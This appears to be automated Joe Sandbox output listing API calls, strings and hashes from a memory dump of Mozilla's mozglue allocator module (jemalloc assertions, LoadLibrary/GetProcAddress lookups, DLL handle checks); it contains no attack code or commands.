                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$CountEnterInitializeK@1@LeaveMaybe@_RandomSpinUint64@mozilla@@$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable_errnomemcpymemset
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 4047164644-4173974723
                                                                  • Opcode ID: b241f2045dc241f7077b351e535304ce819b9f5f78ab27475530dd87b31d3a77
                                                                  • Instruction ID: da49d06536e2195070d81316642b6329adf57322712c74a6c57e1dfc1ca9c34f
                                                                  • Opcode Fuzzy Hash: b241f2045dc241f7077b351e535304ce819b9f5f78ab27475530dd87b31d3a77
                                                                  • Instruction Fuzzy Hash: A5537271A057018FD724CF29C680615FBE1BF86368F29CA6DE8798B791D771E842CB81
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C900F1F
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C900F99
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C900FB7
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C900FE9
                                                                  • memset.VCRUNTIME140(?,000000E5,00000000), ref: 6C901031
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C9010D0
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C90117D
                                                                  • memset.VCRUNTIME140(?,000000E5,?), ref: 6C901C39
                                                                  • EnterCriticalSection.KERNEL32(6C94E744), ref: 6C903391
                                                                  • LeaveCriticalSection.KERNEL32(6C94E744), ref: 6C9033CD
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C903431
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C903437
                                                                  Strings
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C9037A8
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C9037BD
                                                                  • Compile-time page size does not divide the runtime one., xrefs: 6C903946
                                                                  • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C903559, 6C90382D, 6C903848
                                                                  • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C9037D2
                                                                  • <jemalloc>, xrefs: 6C903941, 6C9039F1
                                                                  • MOZ_CRASH(), xrefs: 6C903950
                                                                  • : (malloc) Unsupported character in malloc options: ', xrefs: 6C903A02
                                                                  • MALLOC_OPTIONS, xrefs: 6C9035FE
                                                                  • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C903793
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 3040639385-4173974723
                                                                  • Opcode ID: e25ae8208075b0e3c2ca9825146290089d892b475ba06e2ccde4bec3a5c630d7
                                                                  • Instruction ID: 823e071443241d2eed56d2f658c68729ca27c6bccc541ed4516f462d3004e83e
                                                                  • Opcode Fuzzy Hash: e25ae8208075b0e3c2ca9825146290089d892b475ba06e2ccde4bec3a5c630d7
                                                                  • Instruction Fuzzy Hash: 05539E71B05B018FD304CF29C540616FBE5BF8A728F29C6ADE8699BB91D771E841CB81
                                                                  APIs
                                                                  • LoadLibraryW.KERNEL32(user32,?,6C8FE1A5), ref: 6C925606
                                                                  • LoadLibraryW.KERNEL32(gdi32,?,6C8FE1A5), ref: 6C92560F
                                                                  • GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C925633
                                                                  • GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C92563D
                                                                  • GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C92566C
                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C92567D
                                                                  • GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C925696
                                                                  • GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C9256B2
                                                                  • GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C9256CB
                                                                  • GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C9256E4
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C9256FD
                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C925716
                                                                  • GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C92572F
                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C925748
                                                                  • GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C925761
                                                                  • GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C92577A
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C925793
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C9257A8
                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C9257BD
                                                                  • GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C9257D5
                                                                  • GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C9257EA
                                                                  • GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C9257FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$LibraryLoad
                                                                  • String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
                                                                  • API String ID: 2238633743-1964193996
                                                                  • Opcode ID: 0e329dce8d9b476c3a472fd080571437874da5c630a6e18a3ee08f4fac8b3883
                                                                  • Instruction ID: 42dec26776e56bbe2ecad9643c8100de2e08c2ab2732ad78f664b0aa6f236408
                                                                  • Opcode Fuzzy Hash: 0e329dce8d9b476c3a472fd080571437874da5c630a6e18a3ee08f4fac8b3883
                                                                  • Instruction Fuzzy Hash: 355132707197139BDB01AF398D44D3B3ABCEB8624D770D465E955E2A59EB78C800CFA0
                                                                  APIs
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923527
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C92355B
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9235BC
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9235E0
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C92363A
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923693
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9236CD
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923703
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C92373C
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923775
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C92378F
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923892
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9238BB
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923902
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923939
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923970
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9239EF
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923A26
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923AE5
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923E85
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923EBA
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C923EE2
                                                                    • Part of subcall function 6C926180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6C9261DD
                                                                    • Part of subcall function 6C926180: memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6C92622C
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C9240F9
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C92412F
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C924157
                                                                    • Part of subcall function 6C926180: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6C926250
                                                                    • Part of subcall function 6C926180: free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C926292
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C92441B
                                                                  • floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C924448
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C92484E
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C924863
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C924878
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 6C924896
                                                                  • free.MOZGLUE ref: 6C92489F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: floor$free$malloc$memcpy
                                                                  • String ID:
                                                                  • API String ID: 3842999660-3916222277
                                                                  • Opcode ID: a48bd56035b7663c4c0c1c91535b9b32ab1a62efee18a95737735044c1a2a34c
                                                                  • Instruction ID: 50a483dffd66d434ebad32f75d46b5f7305f9a4b92ac47bdacc8a477b3dc3e7c
                                                                  • Opcode Fuzzy Hash: a48bd56035b7663c4c0c1c91535b9b32ab1a62efee18a95737735044c1a2a34c
                                                                  • Instruction Fuzzy Hash: B7F23874918B808FC721CF28C09469AFBF1BF99308F118A5ED9D997715DB31E896CB42
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(detoured.dll), ref: 6C8D64DF
                                                                  • GetModuleHandleW.KERNEL32(_etoured.dll), ref: 6C8D64F2
                                                                  • GetModuleHandleW.KERNEL32(nvd3d9wrap.dll), ref: 6C8D6505
                                                                  • GetModuleHandleW.KERNEL32(nvdxgiwrap.dll), ref: 6C8D6518
                                                                  • GetModuleHandleW.KERNEL32(user32.dll), ref: 6C8D652B
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C8D671C
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C8D6724
                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C8D672F
                                                                  • GetCurrentProcess.KERNEL32 ref: 6C8D6759
                                                                  • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 6C8D6764
                                                                  • VirtualProtect.KERNEL32(?,00000000,?,?), ref: 6C8D6A80
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C8D6ABE
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D6AD3
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8D6AE8
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8D6AF7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule$CacheCurrentFlushInstructionProcessfree$InfoInit_thread_footerProtectSystemVirtualmemcpy
                                                                  • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows$_etoured.dll$detoured.dll$nvd3d9wrap.dll$nvdxgiwrap.dll$user32.dll
                                                                  • API String ID: 487479824-2878602165
                                                                  • Opcode ID: 51fb228ddbbeb0037898af37d5fc545e3509504a398de991e3374e6a52767460
                                                                  • Instruction ID: c6aa3734485efe4f212d66c31bf13c0dae72631b9b2086bb419c4affc5a4f942
                                                                  • Opcode Fuzzy Hash: 51fb228ddbbeb0037898af37d5fc545e3509504a398de991e3374e6a52767460
                                                                  • Instruction Fuzzy Hash: FBF1E47090522D9FDB30DF24CE48B9AB7B5AF46318F158AE9D809A7641D731BE84CF90
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94E7DC), ref: 6C8F60C9
                                                                  • LeaveCriticalSection.KERNEL32(6C94E7DC), ref: 6C8F610D
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C8F618C
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8F61F9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave
                                                                  • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 3168844106-429003945
                                                                  • Opcode ID: 3677bd59310f7e50dd8d8e588b03c8518ef864fc1c77369c8cedceb9b8c8da16
                                                                  • Instruction ID: 436b897c733b53267563591e9dd01e437d89ff2bc5cf4600715f6faaa334ac4e
                                                                  • Opcode Fuzzy Hash: 3677bd59310f7e50dd8d8e588b03c8518ef864fc1c77369c8cedceb9b8c8da16
                                                                  • Instruction Fuzzy Hash: 78A2BE71A096018FD724CF28C650615BBF1FB85768F29CB6DE869CBB91C771E842CB80
                                                                  APIs
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C92C5F9
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C92C6FB
                                                                  • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C92C74D
                                                                  • memset.VCRUNTIME140(?,00000000,00004008), ref: 6C92C7DE
                                                                  • memset.VCRUNTIME140(?,00000000,00004014), ref: 6C92C9D5
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C92CC76
                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C92CD7A
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C92DB40
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C92DB62
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C92DB99
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C92DD8B
                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C92DE95
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C92E360
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C92E432
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C92E472
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memset$memcpy
                                                                  • String ID:
                                                                  • API String ID: 368790112-0
                                                                  • Opcode ID: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                  • Instruction ID: e438a7fc0287a84e3958930b9311a10e746a3895d62a27b9800a1b7e4f15b960
                                                                  • Opcode Fuzzy Hash: e95889e219d6373aecfb2eefd4d751dbbc7849228894b2438a546aaba38693f8
                                                                  • Instruction Fuzzy Hash: 4D339E72E1021A8FCB14CFA8C8C06ADBBF2FF49310F184269D995AB759D735E945CB90
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94E7B8), ref: 6C8DFF81
                                                                  • LeaveCriticalSection.KERNEL32(6C94E7B8), ref: 6C8E022D
                                                                  • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C8E0240
                                                                  • EnterCriticalSection.KERNEL32(6C94E768), ref: 6C8E025B
                                                                  • LeaveCriticalSection.KERNEL32(6C94E768), ref: 6C8E027B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AllocVirtual
                                                                  • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_RELEASE_ASSERT(mNode)
                                                                  • API String ID: 618468079-3577267516
                                                                  • Opcode ID: 70d4474bb604c508f5942fdc894494188ca0103511a76d8c26cc679c2f7d151f
                                                                  • Instruction ID: 995eb34d55b36772d0326f1d9188c280a9cdc6cdda5a22bd7d78b143f297c0f7
                                                                  • Opcode Fuzzy Hash: 70d4474bb604c508f5942fdc894494188ca0103511a76d8c26cc679c2f7d151f
                                                                  • Instruction Fuzzy Hash: B5C29371A057418FD724CF28C680716BBE1BF8A728F28CE6DE4698B795D771E841CB81
                                                                  APIs
                                                                  • memcpy.VCRUNTIME140(?,?,00004014), ref: 6C92E811
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C92EAA8
                                                                  • memset.VCRUNTIME140(?,000000FF,80808081), ref: 6C92EBD5
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C92EEF6
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C92F223
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C92F322
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C930E03
                                                                  • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C930E54
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C930EAE
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C930ED4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memset$memcpy
                                                                  • String ID:
                                                                  • API String ID: 368790112-0
                                                                  • Opcode ID: ba9ae7938d40ba24d626750aa6bbeca35af7570ea63388cc112c3653163d8d53
                                                                  • Instruction ID: 749d905ec526b7bf9ccdb873c54f62439b15b42a3a69bcb9950d163a147b2a28
                                                                  • Opcode Fuzzy Hash: ba9ae7938d40ba24d626750aa6bbeca35af7570ea63388cc112c3653163d8d53
                                                                  • Instruction Fuzzy Hash: C463AF71E0025ACFCB04CFA8C8905EDFBB2FF89314F298269D859AB755D734A945CB90
                                                                  APIs
                                                                    • Part of subcall function 6C927770: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C903E7D,?,?,?,6C903E7D,?,?), ref: 6C92777C
                                                                  • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000), ref: 6C903F17
                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C903F5C
                                                                  • VerSetConditionMask.NTDLL ref: 6C903F8D
                                                                  • VerSetConditionMask.NTDLL ref: 6C903F99
                                                                  • VerSetConditionMask.NTDLL ref: 6C903FA0
                                                                  • VerSetConditionMask.NTDLL ref: 6C903FA7
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C903FB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ConditionMask$InfoVerifyVersionmemsettolowerwcslen
                                                                  • String ID: nvd3d9wrap.dll$nvinit.dll
                                                                  • API String ID: 1189858803-2380496106
                                                                  • Opcode ID: 01a8395b73be95d8f0be17de5ccb9277b63cc440f31dbdb797894f8a263fe5a3
                                                                  • Instruction ID: 8e9856fe34776f80640b3995864133fc0d6398928680d97881c4e57a9fa67939
                                                                  • Opcode Fuzzy Hash: 01a8395b73be95d8f0be17de5ccb9277b63cc440f31dbdb797894f8a263fe5a3
                                                                  • Instruction Fuzzy Hash: 9952D072614B898FD724DF38C990ABB77E9AF85208F14493DD4968B742DB34F909CB60
                                                                  APIs
                                                                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00010030), ref: 6C8EEE7A
                                                                  • memset.VCRUNTIME140(?,000000FF,80808082,?), ref: 6C8EEFB5
                                                                  • memcpy.VCRUNTIME140(?,?,?,?), ref: 6C8F1695
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8F16B4
                                                                  • memset.VCRUNTIME140(00000002,000000FF,?,?), ref: 6C8F1770
                                                                  • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C8F1A3E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: memset$freemallocmemcpy
                                                                  • String ID:
                                                                  • API String ID: 3693777188-0
                                                                  • Opcode ID: 138e0ad0c4ff37b3b4e29a2b151565ba7f9e23123c3149680b12a9008890e78f
                                                                  • Instruction ID: 78f09ba1be02b405592799ba32d05b00d689bfd053612843f224919f5b92e20c
                                                                  • Opcode Fuzzy Hash: 138e0ad0c4ff37b3b4e29a2b151565ba7f9e23123c3149680b12a9008890e78f
                                                                  • Instruction Fuzzy Hash: DFB32B71E04219CFCB24CFA8C990A9DB7B2FF89304F2585A9D459AB745D730AD86CF90
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94E7B8), ref: 6C8DFF81
                                                                  • LeaveCriticalSection.KERNEL32(6C94E7B8), ref: 6C8E022D
                                                                  • VirtualAlloc.KERNEL32(?,00100000,00001000,00000004), ref: 6C8E0240
                                                                  • EnterCriticalSection.KERNEL32(6C94E768), ref: 6C8E025B
                                                                  • LeaveCriticalSection.KERNEL32(6C94E768), ref: 6C8E027B
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
